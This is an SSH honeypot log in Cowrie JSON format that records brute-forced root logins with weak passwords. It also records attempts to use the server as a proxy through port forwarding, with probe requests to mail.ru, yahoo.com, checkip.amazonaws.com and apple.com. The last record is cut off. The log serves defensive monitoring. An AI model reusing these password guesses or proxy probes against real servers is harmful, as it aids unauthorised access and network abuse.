{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.527089Z","src_ip":"77.83.207.83","session":"af8050ba3df1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2984,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2984","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.577514Z","session":"af8050ba3df1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.627560Z","src_ip":"77.83.207.83","session":"af8050ba3df1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7160,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7160","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.767930Z","session":"af8050ba3df1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.817923Z","src_ip":"77.83.207.83","session":"af8050ba3df1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":14651,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14651","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.960109Z","session":"af8050ba3df1"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.21","src_port":37614,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf9045e13ca7","protocol":"ssh","message":"New connection: 194.0.234.21:37614 (1.2.3.4:22) [session: bf9045e13ca7]","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.002013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.003132Z","src_ip":"194.0.234.21","session":"bf9045e13ca7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.009926Z","src_ip":"77.83.207.83","session":"af8050ba3df1"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.018737Z","src_ip":"194.0.234.21","session":"bf9045e13ca7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.060260Z","src_ip":"77.83.207.83","session":"af8050ba3df1"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.093471Z","src_ip":"194.0.234.21","session":"bf9045e13ca7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":27514,"dst_ip":"1.2.3.4","dst_port":22,"session":"35fc0092ac45","protocol":"ssh","message":"New connection: 77.83.207.83:27514 (1.2.3.4:22) [session: 35fc0092ac45]","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.110340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.111310Z","src_ip":"77.83.207.83","session":"35fc0092ac45"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.162255Z","src_ip":"77.83.207.83","session":"35fc0092ac45"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.415036Z","src_ip":"77.83.207.83","session":"35fc0092ac45"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31474,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31474","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.467012Z","session":"35fc0092ac45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.517945Z","src_ip":"77.83.207.83","session":"35fc0092ac45"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6172,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:6172","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.661172Z","session":"35fc0092ac45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.712580Z","src_ip":"77.83.207.83","session":"35fc0092ac45"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":7880,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:7880","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.857120Z","session":"35fc0092ac45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.908027Z","src_ip":"77.83.207.83","session":"35fc0092ac45"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:57.960071Z","src_ip":"77.83.207.83","session":"35fc0092ac45"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":27639,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c1c362de6e0","protocol":"ssh","message":"New connection: 77.83.207.83:27639 (1.2.3.4:22) [session: 3c1c362de6e0]","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.008612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.009595Z","src_ip":"77.83.207.83","session":"3c1c362de6e0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.059691Z","src_ip":"77.83.207.83","session":"3c1c362de6e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.309940Z","src_ip":"77.83.207.83","session":"3c1c362de6e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17724,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17724","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.360991Z","session":"3c1c362de6e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.411217Z","src_ip":"77.83.207.83","session":"3c1c362de6e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.195.91.125","dst_port":443,"src_ip":"194.0.234.21","src_port":60864,"message":"direct-tcp connection request to 54.195.91.125:443 from 127.0.0.1:60864","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.524671Z","session":"bf9045e13ca7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":2345,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:2345","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.552332Z","session":"3c1c362de6e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.195.91.125","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xca\\x82)H&`QJV)\\xabY\\x87\\xcb\\xd21C\\xe6\\xb7$v\\x8a]rTu\\xa0\\xf28\\x11\\x02\\x07 !`v\\x1c\\x18\\x8b.#\\x02\\xf1\\xcb0\\x1a\\x15j\\xcb\\xd2M\\x0f[\\xcdJ\\xc8\\xa3\\xe5\\n\\x10\\x1b\\xbaGR*\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9a \\x11\\xe5d(\\xb0\\xfcB\\x87\\xc8#Qe2/\\t\\x97\\xcc\\x0c\\xaa\\xf0\\xa6\\xd3p\\xc7\\xfa\\x0f)\\xa4\\xe2W\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.195.91.125:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xca\\x82)H&`QJV)\\xabY\\x87\\xcb\\xd21C\\xe6\\xb7$v\\x8a]rTu\\xa0\\xf28\\x11\\x02\\x07 !`v\\x1c\\x18\\x8b.#\\x02\\xf1\\xcb0\\x1a\\x15j\\xcb\\xd2M\\x0f[\\xcdJ\\xc8\\xa3\\xe5\\n\\x10\\x1b\\xbaGR*\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9a \\x11\\xe5d(\\xb0\\xfcB\\x87\\xc8#Qe2/\\t\\x97\\xcc\\x0c\\xaa\\xf0\\xa6\\xd3p\\xc7\\xfa\\x0f)\\xa4\\xe2W\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.578449Z","src_ip":"194.0.234.21","session":"bf9045e13ca7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.602231Z","src_ip":"77.83.207.83","session":"3c1c362de6e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"104.76.24.222","dst_port":443,"src_ip":"194.0.234.21","src_port":32828,"message":"direct-tcp connection request to 104.76.24.222:443 from 127.0.0.1:32828","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.657593Z","session":"bf9045e13ca7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"104.76.24.222","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x80\\xb4aA\\x927E%KP\\xf8\\xcf\\xe2\\xd0\\xf1\\xe0\\x1a\\x06\\xc1i\\x86\\xcb\\xd3\\x81Ty\\xa8\\xb9fi\\x99\\xb9 l\\xcdS\\xed\\xe2I\\xe7\\xc0\\x1f\\xda\\xab\\x01\\xb9\\xd4\\x91\\x02\\xaa\\xea\\xca\\x97\\xca\\xa6\\x03\\xb4\\xc92\\x91\\xed\\xc5\\xde\\xc9c\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x08\\rI\\x1a\\xf5\\xca\\xc6&6\\xf3\\xfeg\\x19\\xed]*\\xedt&\\xa0\\x04\\x9d\\xc7\\xaa\\x91\\xdd).\\xe57*^\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 104.76.24.222:443 with data 